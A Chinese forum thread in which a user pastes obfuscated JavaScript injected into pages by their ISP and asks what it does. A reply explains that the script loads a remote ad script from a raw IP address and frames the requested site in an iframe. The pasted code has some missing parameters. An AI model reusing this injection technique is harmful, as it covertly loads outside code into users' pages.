这是一个创建于 3600 天前的主题,其中的信息可能已经有所发展或是发生改变。
电信用户,最近一段时间打开很多网站,比如百度淘宝之类的都是空白页,就是服务器有问题也会报错误吧,就是白白的一片,右键点击查看源代码一看,还是有点货的,如下
<script>var d="=iunm?=ifbe?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00333/94/9/6;910benpef/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#?wbs!qbsbn>#iuuq;00333/94/9/6;910b0l@uddb>cEZ5Okd1OkCBfHpvZ35>'vsjq>483::7924:'psmv>bIS1dEpwM4e4ez6jZXmleT6kc31wZ";function i(,){+=_;var $="";for(var u=0;u<.length;u++){var r=_.charCodeAt(u);$+=String.fromCharCode(r-1);}return $;} var c="nGq[IV0e3R:KVKDKVF5KVSHKVNzKoSvQX2wcnyqcnWg[Hd>'tqje>74:12:7:7'bsfb>76'ut>252:7931:7'luzqf>1'lxje>1'xuzqf>23'xtje>299#<=0tdsjqu?=0ifbe?=cpez!je>#c#!sjhiuNbshjo>1!upqNbshjo>1!mfguNbshjo>1!tdspmm>op!pompbe>#joju)qbsbn*#?=0cpez?=0iunm?";document.write(i(d,c));</script>
找了个解码网站,解码后如下
< script > var d = "=iunm?=ifbe?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00333/94/9/6;910benpef/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#?wbs!qbsbn>#iuuq;00333/94/9/6;910b0l@uddb>cEZ5Okd1OkCBfHpvZ35>'vsjq>483::7924:'psmv>bIS1dEpwM4e4ez6jZXmleT6kc31wZ";
function i(, _)
{
_ += __;
var $ = "";
for (var u = 0; u < _.length; u++) {
var r = _.charCodeAt(u);
$ += String.fromCharCode(r - 1);
}
return $;
}
var c = "nGq[IV0e3R:KVKDKVF5KVSHKVNzKoSvQX2wcnyqcnWg[Hd>'tqje>74:12:7:7'bsfb>76'ut>252:7931:7'luzqf>1'lxje>1'xuzqf>23'xtje>299#<=0tdsjqu?=0ifbe?=cpez!je>#c#!sjhiuNbshjo>1!upqNbshjo>1!mfguNbshjo>1!tdspmm>op!pompbe>#joju)qbsbn*#?=0cpez?=0iunm?";
document.write(i(d, c));
</script>
本人不懂javascript,但是知道那个i函数是解码的,isp这么大费周折的加密这段代码有何用意。
 |
1
aaaa007cn 2014-12-27 20:42:09 +08:00
混淆了
当然是为了让用户不能一眼看出这代码是干什么的 解码后可以看出会调用 http://222.83.8.5:80/admode.js 把目标网站嵌入一个 iframe |
Select Language